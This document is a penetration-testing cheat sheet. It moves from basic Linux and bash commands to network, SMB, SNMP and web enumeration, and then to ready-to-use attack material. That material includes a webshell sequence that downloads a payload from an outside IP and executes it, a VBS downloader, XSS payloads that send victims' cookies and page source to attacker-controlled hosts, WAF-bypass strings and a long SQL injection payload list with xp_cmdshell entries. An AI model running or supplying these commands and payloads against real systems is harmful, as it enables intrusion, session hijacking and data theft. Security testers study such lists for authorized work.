[+] Create a file and append text to it: ifconfig > tmp echo >> tmp ping google.com -c3 >> tmp

[+] How to view a file: cat file Show entire contents of file. more file Show one page at a time. Space bar for next page and (q) to exit. head file Show the first 10 lines. head -15 file Show the first 15 lines. tail file Show the last 10 lines. tail -15 file Show the last 15 lines. tail -f file Useful when viewing the output of a log file.

[+] pipe cat tmp | grep Bcast Feeds the output of one process to the input of another process.

[+] Processes ps aux Show all running process for all users. kill -9 PID Nicely kill a PID.

[+] Word Count wc -l tmp2 Count the number of lines in a file

[+] cut -d delimiter -f fields

[+] sort Sort by unique sort -u file sort IP addresses correct sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address

[+] awk awk '{print $1}' file Show the 1st column. awk '{print $1,$5}' file Show the 1st and 5th columns.

[+] grep grep -v Remove a single string. grep -v 'red' file

[+] egrep -v Remove multiple strings egrep -v '(red|white|blue)' file

[+] sed sed 's/FOO/BAR/g' file Replace FOO with BAR. sed 's/FOO//g' file Replace FOO with nothing. sed '/^FOO/d' file Remove lines that start with FOO.

[+] colour 31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan echo -e "\e[1;34mThis is a blue text.\e[0m"

Bash Scripts

[+] Simple bash script: #!/bin/bash clear echo echo print "Hello world."

[+] Make a file executable. chmod +x file chmod 755 file

[+] Variables name=Bob echo $name user=$(whoami) echo $user echo 'Hello' $name. 'You are running as' $user.

#!/bin/bash clear echo "Hello World" name=Bob ip=ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1 echo "Hello" $name "Your IP address is:" $ip

[+] User Input read -p "Domain: " domain

#!/bin/bash echo "Please input your domain:" read -p "Domain:" domain ping -c 5 $domain

[+] Check For No User Input if [ -z $domain ]; then echo echo "#########################" echo echo "Invalid choice." echo exit fi

[+] For loops #!/bin/bash

for host in $(cat hosts.txt) do command $host done

[+] One Liners

Port Scan: for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done

Use a bash loop to find the IP address behind each host: for url in $(cat list.txt); do host $url; done

[+] Condition Onliner

any command && if work || if not work type -p massdns && massdns -r resolver.txt -t A -o S sub.txt -w sub.mass || echo "MassDns not installed"

[+] Condition Onliner with multiple action

any command && { if work; also this; also this } || { if not work; also this; also this } type -p massdns && { massdns -r resolver.txt -t A -o S sub.txt -w sub.mass; cat sub.mass } || { echo "MassDns not installed"; echo "Install MassDns" }

# How to survie inside Kali Linux / Linux in general

Set the ip address as a varble export ip=192.168.1.100 nmap -A -T4 -p- $ip

Netcat port Scanning nc -nvv -w 1 -z $ip 3388-3390

Discover active IPs usign ARP on the network: arp-scan $ip/24

Discover who else is on the network netdiscover

Discover IP Mac and Mac vendors from ARP netdiscover -r $ip/24

Nmap stealth scan using SYN nmap -sS $ip

Nmap stealth scan using FIN nmap -sF $ip

Nmap Banner Grabbing nmap -sV -sT $ip

Nmap OS Fingerprinting nmap -O $ip

Nmap Regular Scan: nmap $ip/24

Enumeration Scan nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt

Enumeration Scan All Ports TCP / UDP and output to a txt file nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip

Nmap output to a file: nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24

Quick Scan: nmap -T4 -F $ip/24

Quick Scan Plus: nmap -sV -T4 -O -F --version-light $ip/24

Quick traceroute nmap -sn --traceroute $ip

All TCP and UDP Ports nmap -v -sU -sS -p- -A -T4 $ip

Intense Scan: nmap -T4 -A -v $ip

Intense Scan Plus UDP nmap -sS -sU -T4 -A -v $ip/24

Intense Scan ALL TCP Ports nmap -p 1-65535 -T4 -A -v $ip/24

Intense Scan - No Ping nmap -T4 -A -v -Pn $ip/24

Ping scan nmap -sn $ip/24

Slow Comprehensive Scan nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24

Scan with Active connect in order to weed out any spoofed ports designed to troll you nmap -p1-65535 -A -T5 -sT $ip

====== Enumeration ======

DNS Enumeration

NMAP DNS Hostnames Lookup nmap -F --dns-server

Host Lookup host -t ns megacorpone.com

Reverse Lookup Brute Force - find domains in the same range for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"

Perform DNS IP Lookup dig a domain-name-here.com @nameserver

Perform MX Record Lookup dig mx domain-name-here.com @nameserver

Perform Zone Transfer with DIG dig axfr domain-name-here.com @nameserver

DNS Zone Transfers Windows DNS zone transfer

nslookup -> set type=any -> ls -d blah.com

Linux DNS zone transfer

dig axfr blah.com @ns1.blah.com

Dnsrecon DNS Brute Force dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

Dnsrecon DNS List of megacorp dnsrecon -d megacorpone.com -t axfr

DNSEnum dnsenum zonetransfer.me

NMap Enumeration Script List:

NMap Discovery https://nmap.org/nsedoc/categories/discovery.html

Nmap port version detection MAXIMUM power nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p

NFS (Network File System) Enumeration

Show Mountable NFS Shares nmap -sV --script=nfs-showmount $ip RPC (Remote Procedure Call) Enumeration

Connect to an RPC share without a username and password and enumerate privledges rpcclient --user="" --command=enumprivs -N $ip

Connect to an RPC share with a username and enumerate privledges rpcclient --user="" --command=enumprivs $ip

SMB Enumeration

SMB OS Discovery nmap $ip --script smb-os-discovery.nse

Nmap port scan nmap -v -p 139,445 -oG smb.txt $ip-254

Netbios Information Scanning nbtscan -r $ip/24

Nmap find exposed Netbios servers nmap -sU --script nbstat.nse -p 137 $ip

Nmap all SMB scripts scan

nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip

Nmap all SMB scripts authenticated scan

nmap -sV -Pn -vv -p 445 --script-args smbuser=,smbpass= --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip

SMB Enumeration Tools nmblookup -A $ip

smbclient //MOUNT/share -I $ip -N

rpcclient -U "" $ip

enum4linux $ip

enum4linux -a $ip

SMB Finger Printing smbclient -L //$ip

Nmap Scan for Open SMB Shares nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24

Nmap scans for vulnerable SMB Servers nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip

Nmap List all SMB scripts installed ls -l /usr/share/nmap/scripts/smb*

Enumerate SMB Users

nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14

OR

python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip

RID Cycling - Null Sessions ridenum.py $ip 500 50000 dict.txt

Manual Null Session Testing

Windows: net use \$ip\IPC$ "" /u:""

Linux: smbclient -L //$ip

SMTP Enumeration - Mail Severs

Verify SMTP port using Netcat nc -nv $ip 25

SNMP Enumeration -Simple Network Management Protocol

Fix SNMP output values so they are human readable apt-get install snmp-mibs-downloader download-mibs echo "" > /etc/snmp/snmp.conf

SNMP Enumeration Commands

snmpcheck -t $ip -c public

snmpwalk -c public -v1 $ip 1|

grep hrSWRunName|cut -d* * -f

snmpenum -t $ip

onesixtyone -c names -i hosts

SNMPv3 Enumeration nmap -sV -p 161 --script=snmp-info $ip/24

Automate the username enumeration process for SNMPv3: apt-get install snmp snmp-mibs-downloader wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb

SNMP Default Credentials /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

MS SQL Server Enumeration

Nmap Information Gathering

nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip

List all SUID files find / -perm -4000 2>/dev/null

Determine the current version of Linux cat /etc/issue

Determine more information about the environment uname -a

List processes running ps -xaf

List the allowed (and forbidden) commands for the invoking use sudo -l

List iptables rules iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL -t raw iptables -vL -t security

net config Workstation

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

hostname

net users

ipconfig /all

route print

arp -A

netstat -ano

netsh firewall show state

netsh firewall show config

schtasks /query /fo LIST /v

tasklist /SVC

net start

DRIVERQUERY

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

dir /s pass == cred == vnc == .config

findstr /si password *.xml *.ini *.txt

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

Search for folders with gobuster: gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip

OWasp DirBuster - Http folder enumeration - can take a dictionary file

Dirb - Directory brute force finding using a dictionary file dirb http://$ip/ wordlist.dict dirb http://vm/

Dirb against a proxy

dirb http://$ip/ -p $ip:3129

Nikto nikto -h $ip

HTTP Enumeration with NMAP nmap --script=http-enum -p80 -n $ip/24

Nmap Check the server methods nmap --script http-methods --script-args http-methods.url-path='/test' $ip

Get Options available from web server curl -vX OPTIONS vm/test

Uniscan directory finder: uniscan -qweds -u http://vm/

Wfuzz - The web brute forcer

wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test

wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"

wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ

Recurse level 3

wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ

Open a service using a port knock (Secured with Knockd) for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x server_ip_address; done

WordPress Scan - Wordpress security scanner

wpscan --url $ip/blog --proxy $ip:3129 RSH Enumeration - Unencrypted file transfer system

auxiliary/scanner/rservices/rsh_login Finger Enumeration

finger @$ip

finger batman@$ip

TLS & SSL Testing

./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html Proxy Enumeration (useful for open proxies)

nikto -useproxy http://$ip:3128 -h $ip Steganography

apt-get install steghide

steghide extract -sf picture.jpg

steghide info picture.jpg

apt-get install stegosuite

The OpenVAS Vulnerability Scanner

apt-get update apt-get install openvas openvas-setup

netstat -tulpn

Login at: https://$ip:9392

Post exploitation refers to the actions performed by an attacker, once some level of control has been gained on his target.

Simple Local Web Servers

Run a basic http server, great for serving up shells etc python -m SimpleHTTPServer 80

Run a basic Python3 http server, great for serving up shells etc python3 -m http.server

Run a ruby webrick basic http server ruby -rwebrick -e "WEBrick::HTTPServer.new (:Port => 80, :DocumentRoot => Dir.pwd).start"

Run a basic PHP http server php -S $ip:80

Creating a wget VB Script on Windows: https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt

Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):

echo Set args = Wscript.Arguments >> webdl.vbs timeout 1 echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs timeout 1 echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs timeout 1 echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs timeout 1 echo xHttp.Open "GET", Url, False >> webdl.vbs timeout 1 echo xHttp.Send >> webdl.vbs timeout 1 echo with bStrm >> webdl.vbs timeout 1 echo .type = 1 ' >> webdl.vbs timeout 1 echo .open >> webdl.vbs timeout 1 echo .write xHttp.responseBody >> webdl.vbs timeout 1 echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs timeout 1 echo end with >> webdl.vbs timeout 1 echo The file can be run using the following syntax:

C:\temp\cscript.exe webdl.vbs

Mounting File Shares

Mount NFS share to /mnt/nfs mount $ip:/vol/share /mnt/nfs HTTP Put nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php

Uploading Files SCP

scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2

scp localfile username@$ip:~/Folder/

scp Linux_Exploit_Suggester.pl bob@192.168.1.10:~

Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor

davtest -move -sendbd auto -url http://$ip

https://github.com/cldrn/davtest

You can also upload a file using the PUT method with the curl command:

curl -T 'leetshellz.txt' 'http://$ip'

And rename it to an executable file using the MOVE method with the curl command:

curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'

Upload shell using limited php shell cmd use the webshell to download and execute the meterpreter [curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O /tmp/evil" http://$ip/files/sh.php [curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php

TFTP mkdir /tftp atftpd --daemon --port 69 /tftp cp /usr/share/windows-binaries/nc.exe /tftp/ EX. FROM WINDOWS HOST: C:\Users\Offsec>tftp -i $ip get nc.exe

FTP apt-get update && apt-get install pure-ftpd

#!/bin/bash groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pw useradd offsec -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/

/etc/init.d/pure-ftpd restart

XSS1

[ ] Tools

https://github.com/DanMcInerney/xsscrapy
https://github.com/s0md3v/XSStrike
# Cross Site Scripting detection suite equipped with parsers
# XSStrike analyses the response with multiple parsers and then crafts payloads
# that are guaranteed to work by context analysis integrated with a fuzzing engine

# Documentation
https://github.com/s0md3v/XSStrike/wiki/Usage

# Classical GET
python xsstrike.py -u "http://example.com/search.php?q=query"

# POST
python xsstrike.py -u "http://example.com/search.php" --data "q=query"

# Path payloads
python xsstrike.py -u "http://example.com/search/form/query" --path

# Crawl and test
python xsstrike.py -u "http://example.com/page.php" --crawl

# Load payloads from file and test them
python3 xsstrike.py -u "http://example.com/page.php?q=query" -f /path/to/file.txt

# Find hidden parameters
python xsstrike.py -u "http://example.com/page.php" --params

[ ] automate Rxss

method uniq

https://github.com/yavolo/eventlistener-xss-recon

first method

- collect a sub domain (AssetFinder - SubFinder – Amass – Find-domain - Google Dorking) 
 
- find the number of sub-domains which are active ( `httprobe (Tomnomnom) – HTTPX )  >> cat subdomains.txt | httprobe | tee -a host.txt 

- use your payloads :`` <script/src=//NJ.₨></script> 

- your report if not acceptd 

-  cat host.txt | crawler | tee -a endpoint.txt   & cat host.txt | waybackurl | tee -a endpoint.txt 

- After finding all the 50 Lakh endpoint I started to fuzz all the parameters to find xss vulnerability with the help of the tool qsreplace. The command used was: 

      cat endpoint.txt | qsreplace ‘“><img src=x onerror=alert(1)> | tee -a xss_fuzz.txt 

- After executing the command now, I had to check the number of parameters have been reflecting our payload into a plain text weather or not, So I created a tool named FREQ which is also available in my GitHub repo. So, the tool sends multiple requests to the check whether the response containing the payload return us with the affected URLs. The command used to perform this attack was: 

 cat xss_fuzz.txt | freq | tee -a possible_xss.txt 

second method

cleanP : github.com/raoufmaklouf/c… 

injectP: github.com/raoufmaklouf/i… 

XSS.yaml : gist.githubusercontent.com/raoufmaklouf/7… 

- single target: `gau target.com | cleanP | injectP 'T%22rSpGeUMo%3E7N' | httpx -ms 'T"rSpGeUMo>7N' | nuclei -t XSS.yaml -o xss.txt 
& 
- cat AllEndPoint.txt | cleanP | injectP 'T%22rSpGeUMo%3E7N' | httpx -ms 'T"rSpGeUMo>7N' | nuclei -t XSS.yaml -o xss.txt 

third method

irst of all, I enumerated all subdomains of the target.com with [subfinder](https://github.com/projectdiscovery/subfinder) and 
then subdomain brute-forcing with [knockpy](https://github.com/guelfoweb/knock), 
then I used [waybackurls](https://github.com/tomnomnom/waybackurls) to get parameters to test for XSS and then I used [gf](https://github.com/tomnomnom/gf) to get possible XSS parameters. 
after sorting the URLs I used [KXSS](https://github.com/Emoe/kxss) 
And [Dalfox](https://github.com/hahwul/dalfox). Bad luck I got nothing. 

Four method

https://mirror-medium.com/?m=https://medium.com/@c0nqr0r/reading-robots-txt-got-me-4-xss-reports-9fd2234c635f&fbclid=IwAR1Z9wF54pIr0l3uLd9xLxiip3gbiWPDo-CFkNaGtrM7FTrLXDBzfI8pqKw

[ ] Tips

# If XSS is not executed through the UI, you can try to insert it through the API
# It can then fire on the UI. Many filters are not present like this

Payloads

# Document.location
<script>document.location('http://IP_EXTERNE/'+document.cookie)</script>
<script>document.location.href = 'http://requestb.in/XXXXXX?cookies =' + document.cookie;</script>

# Window
<script>window.open("http://monserveur/Cookie="+document.cookie)</script>
<script>window.location='http://monsite.free.fr/script.php?cookies='+(document.cookie);</script>

# Document.write
<script>document.write('<img src="https://requestb.in/xxxxx?cookie="+document.cookie>admin</img>');</script>
admin"></i>)</span><script>document.write("<img src=http://requestb.in/XXXXX?cookie=".concat(encodeURI(document.cookie)).concat("/>"))</script><i>

<script>var xhr = new XMLHttpRequest();xhr.open('POST', 'http://requestb.in/w0sw22w0', true);xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xhr.send(document.cookie);</script>

# alert(1) in JS
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

injecting inside of input tags
<input/onfocus=alert(0) autofocus>
<input/onfocus=alert`0` autofocus>
<input/onfocus=prompt`0` autofocus>
1'"><input/onfocus={alert`1`} autofocus> 

# WAF Bypass
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<svg/onload=(((confirm(1))))>
confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)

# No HTML events
<script>alert(1)//
<script>alert(1)<!--
<script>alert(1)%0A-->
<script src=data:,alert(1)>
<script src=//HOST/FILE>
<script src=https:DOMAIN/FILE>
<svg><script xlink:href=//HOST/FILE>
<svg><script xlink:href=https:DOMAIN/FILE>
<svg><script xlink:href=data:,alert(1)>
<svg/onload=(confirm(1))>
<svg/onload=confirm(1)>

# Stealing the source code without triggering browser restrictions
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

# Non alphanumeric alert() payload
Ð=[],Ř=+!+Ð,ˍ=Ř+Ř+Ř,Š=!!Ð+Ð,Ť=!Ð+Ð,Ǎ=(!Ð+{})[Ř+[+Ð]],Č=(Ð+{})[Ř],Ȟ=Š[Ř],Ě=Š[+Ð],_=Ť[ˍ]+Č+Ȟ+Ě,ǰ=Ð[_]+Ð,š=Ð[Ð]+Ð,Ð[_][Ǎ+Č+(š)[Ř]+Ť[ˍ]+Ě+Ȟ+(š)[+Ð]+Ǎ+Ě+Č+Ȟ](Ť[Ř]+Ť[Ř+Ř]+Š[ˍ]+Ȟ+Ě+ǰ[Ř+[ˍ]]+ǰ[Ř+[ˍ+Ř]])()

SQL INJECTION

 or 1=1 --
 or 3=3 --
!
"
" OR "" = "
" OR 1 = 1 -- -
" and 0=benchmark(3000000,MD5(1))%20%23
" and 0=benchmark(3000000,MD5(1))%20--
" and 0=benchmark(3000000,MD5(1))%20/*
" or "a"="a
" or 0=0 --
" or 1=1--
" or benchmark(10000000,MD5(1))#
" or isNULL(1/0) /*
" or pg_sleep(5)--
" or pg_sleep(__TIME__)--
" or sleep(5)#
" or sleep(5)="
" or sleep(__TIME__)#
" or sleep(__TIME__)="
" waitfor delay '0:0:20' --
" waitfor delay '0:0:20' /*
""
")
") and 0=benchmark(3000000,MD5(1))%20%23
") and 0=benchmark(3000000,MD5(1))%20--
") and 0=benchmark(3000000,MD5(1))%20/*
") or benchmark(10000000,MD5(1))#
") or pg_sleep(5)--
") or pg_sleep(__TIME__)--
") or sleep(5)="
") or sleep(__TIME__)="
") waitfor delay '0:0:20' --
") waitfor delay '0:0:20' /*
"))
")) and 0=benchmark(3000000,MD5(1))%20%23
")) and 0=benchmark(3000000,MD5(1))%20--
")) and 0=benchmark(3000000,MD5(1))%20/*
")) or benchmark(10000000,MD5(1))#
")) or pg_sleep(5)--
")) or pg_sleep(__TIME__)--
")) or sleep(5)="
")) or sleep(__TIME__)="
")) waitfor delay '0:0:20' --
")) waitfor delay '0:0:20' /*
")))
"))) and 0=benchmark(3000000,MD5(1))%20%23
"))) and 0=benchmark(3000000,MD5(1))%20--
"))) and 0=benchmark(3000000,MD5(1))%20/*
"))) waitfor delay '0:0:20' --
"))) waitfor delay '0:0:20' /*
")))) and 0=benchmark(3000000,MD5(1))%20%23
")))) and 0=benchmark(3000000,MD5(1))%20--
")))) and 0=benchmark(3000000,MD5(1))%20/*
")))) waitfor delay '0:0:20' --
")))) waitfor delay '0:0:20' /*
"))))) waitfor delay '0:0:20' --
"))))) waitfor delay '0:0:20' /*
")))))) waitfor delay '0:0:20' --
")))))) waitfor delay '0:0:20' /*
"));waitfor delay '0:0:5'--
"));waitfor delay '0:0:__TIME__'--
");
");waitfor delay '0:0:5'--
");waitfor delay '0:0:__TIME__'--
";
";waitfor delay '0:0:5'--
";waitfor delay '0:0:__TIME__'--
"a"" or 1=1--"
"a"" or 3=3--"
"hi"") or (""a""=""a"
#	    Hash comment
# Numeric
# from wapiti
#NAME?
%		wildcard attribute indicator
%"
%")
%'
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
%')
%00
%20$(sleep%2050)
%20'sleep%2050'
%20or%20''='
%20or%20'x'='x
%20or%201=1
%20or%20x=x
%21
%26
%27%20or%201=1
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%2c(select%20*%20from%20(select(sleep(10)))a)
%7C
&
&&SLEEP(5)
&&SLEEP(5)#
&&SLEEP(5)--
'%20OR
'
' (select top 1
' AND MID(VERSION(),1,1) = '5';
' AND id IS NULL; --
' AnD SLEEP(5) ANd '1
' GROUP BY columnnames having 1=1 --
' OR '' = '
' OR '1
' OR 'x'='x
' OR 1 -- -
' UNION ALL SELECT
' UNION SELECT
' UNION SELECT sum(columnname ) from tablename --
' and 0=benchmark(3000000,MD5(1))%20%23
' and 0=benchmark(3000000,MD5(1))%20--
' and 0=benchmark(3000000,MD5(1))%20/*
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
' or "
' or ''='
' or '1'='1'--
' or (EXISTS)
' or 0=0 #
' or 0=0 --
' or 1 --'
' or 1=1
' or 1=1 or ''='
' or 1=1--
' or 3=3
' or 3=3 --
' or a=a--
' or benchmark(10000000,MD5(1))#
' or pg_sleep(5)--
' or pg_sleep(__TIME__)--
' or sleep(5)#
' or sleep(5)='
' or sleep(__TIME__)#
' or sleep(__TIME__)='
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
' waitfor delay '0:0:20' --
' waitfor delay '0:0:20' /*
'"
'%20or%20''='
'%20or%20'x'='x
'%20or%201=1
'&&SLEEP(5)&&'1
''
'''''''''''''UNION SELECT '2
')
') and 0=benchmark(3000000,MD5(1))%20%23
') and 0=benchmark(3000000,MD5(1))%20--
') and 0=benchmark(3000000,MD5(1))%20/*
') or ('a'='a
') or benchmark(10000000,MD5(1))#
') or pg_sleep(5)--
') or pg_sleep(__TIME__)--
') or sleep(5)='
') or sleep(__TIME__)='
') waitfor delay '0:0:20' --
') waitfor delay '0:0:20' /*
')%20or%20('x'='x
'))
')) and 0=benchmark(3000000,MD5(1))%20%23
')) and 0=benchmark(3000000,MD5(1))%20--
')) and 0=benchmark(3000000,MD5(1))%20/*
')) or benchmark(10000000,MD5(1))#
')) or pg_sleep(5)--
')) or pg_sleep(__TIME__)--
')) or sleep(5)='
')) or sleep(__TIME__)='
')) waitfor delay '0:0:20' --
')) waitfor delay '0:0:20' /*
'))) and 0=benchmark(3000000,MD5(1))%20%23
'))) and 0=benchmark(3000000,MD5(1))%20--
'))) and 0=benchmark(3000000,MD5(1))%20/*
'))) waitfor delay '0:0:20' --
'))) waitfor delay '0:0:20' /*
')))) and 0=benchmark(3000000,MD5(1))%20%23
')))) and 0=benchmark(3000000,MD5(1))%20--
')))) and 0=benchmark(3000000,MD5(1))%20/*
')))) waitfor delay '0:0:20' --
')))) waitfor delay '0:0:20' /*
'))))) waitfor delay '0:0:20' --
'))))) waitfor delay '0:0:20' /*
')))))) waitfor delay '0:0:20' --
')))))) waitfor delay '0:0:20' /*
'));waitfor delay '0:0:5'--
'));waitfor delay '0:0:__TIME__'--
');waitfor delay '0:0:5'--
');waitfor delay '0:0:__TIME__'--
';
'; exec master..xp_cmdshell
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'; exec xp_regread
';WAITFOR DELAY '0:0:30'--
';waitfor delay '0:0:5'--
';waitfor delay '0:0:__TIME__'--
'='
'=0--+
'LIKE'
'\"
'hi' or 'x'='x';
'sqlattempt1
'||UTL_HTTP.REQUEST
(
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
(select top 1
(sqlattempt2)
(sqlvuln)
(||6)
)
) and 0=benchmark(3000000,MD5(1))%20%23
) and 0=benchmark(3000000,MD5(1))%20--
) and 0=benchmark(3000000,MD5(1))%20/*
) or ('a'='a
) or (a=a
) or benchmark(10000000,MD5(1))#
) or benchmark(10000000,MD5(1))#"
) or pg_sleep(__TIME__)--
) or sleep(__TIME__)=
) or sleep(__TIME__)='
) union select * from information_schema.tables;
) waitfor delay '0:0:20' --
) waitfor delay '0:0:20' /*
)%20or%20('x'='x
)) and 0=benchmark(3000000,MD5(1))%20%23
)) and 0=benchmark(3000000,MD5(1))%20--
)) and 0=benchmark(3000000,MD5(1))%20/*
)) or benchmark(10000000,MD5(1))#
)) or pg_sleep(__TIME__)--
)) or pg_sleep(__TIME__)--"
)) or sleep(__TIME__)="""
)) or sleep(__TIME__)='
)) waitfor delay '0:0:20' --
)) waitfor delay '0:0:20' /*
))) and 0=benchmark(3000000,MD5(1))%20%23
))) and 0=benchmark(3000000,MD5(1))%20--
))) and 0=benchmark(3000000,MD5(1))%20/*
))) waitfor delay '0:0:20' --
))) waitfor delay '0:0:20' /*
)))) and 0=benchmark(3000000,MD5(1))%20%23
)))) and 0=benchmark(3000000,MD5(1))%20--
)))) and 0=benchmark(3000000,MD5(1))%20/*
)))) waitfor delay '0:0:20' --
)))) waitfor delay '0:0:20' /*
))))) waitfor delay '0:0:20' --
)))))) waitfor delay '0:0:20' --
));waitfor delay '0:0:5'--
));waitfor delay '0:0:__TIME__'--
);waitfor delay '0:0:5'--
);waitfor delay '0:0:__TIME__'--
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
+		addition, concatenate (or space in url)
+ SLEEP(10) + '
+benchmark(3200,SHA1(1))+'
+sqlvuln
,
,(select * from (select(sleep(10)))a)
,@variable
--
-- &password=
-- -	SQL comment
-- or #
--sp_password
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
-1' UNION SELECT 1,2,3--+
-2
/
/*  	C-style comment
/**/or/**/1/**/=/**/1
/*…*/
//
//*
0
0 or 1=1
0x730065006c0065006300740020004000400076006500 ...
0x770061006900740066006F0072002000640065006C00 ...
0x77616974666F722064656C61792027303A303A313027 ...
1 AND (SELECT * FROM Users) = 1
1 or 1=1
1 or benchmark(10000000,MD5(1))#
1 or pg_sleep(5)--
1 or pg_sleep(__TIME__)--
1 or sleep(5)#
1 or sleep(__TIME__)#
1 waitfor delay '0:0:10'--
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
1' ORDER BY 1,2,3--+
1' ORDER BY 1,2--+
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1) or benchmark(10000000,MD5(1))#
1) or pg_sleep(5)--
1) or pg_sleep(__TIME__)--
1) or sleep(5)#
1) or sleep(__TIME__)#
1)) or benchmark(10000000,MD5(1))#
1)) or pg_sleep(5)--
1)) or pg_sleep(__TIME__)--
1)) or sleep(5)#
1)) or sleep(__TIME__)#
1*56
1-false
1-true
1;(load_file(char(47,101,116,99,47,112,97,115, ...
1;SELECT%20*
21 %
21%
23 OR 1=1
26 %
26%
28 %
28%
29 %
29%
3.10E+17
;
; begin declare @var varchar(8000) set @var=' ...
; exec ('sel' + 'ect us' + 'er')
; exec master..xp_cmdshell
; exec master..xp_cmdshell 'ping 172.10.1.255'--
; exec xp_regread
; execute immediate 'sel' || 'ect us' || 'er'
; or '1'='1'
;%00	Nullbyte
;waitfor delay '0:0:5'--
;waitfor delay '0:0:__TIME__'--
<>"'%;)(&+
?
@@variable	global variable
@var select @var as var into temp end --
@variable
@variable	local variable
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
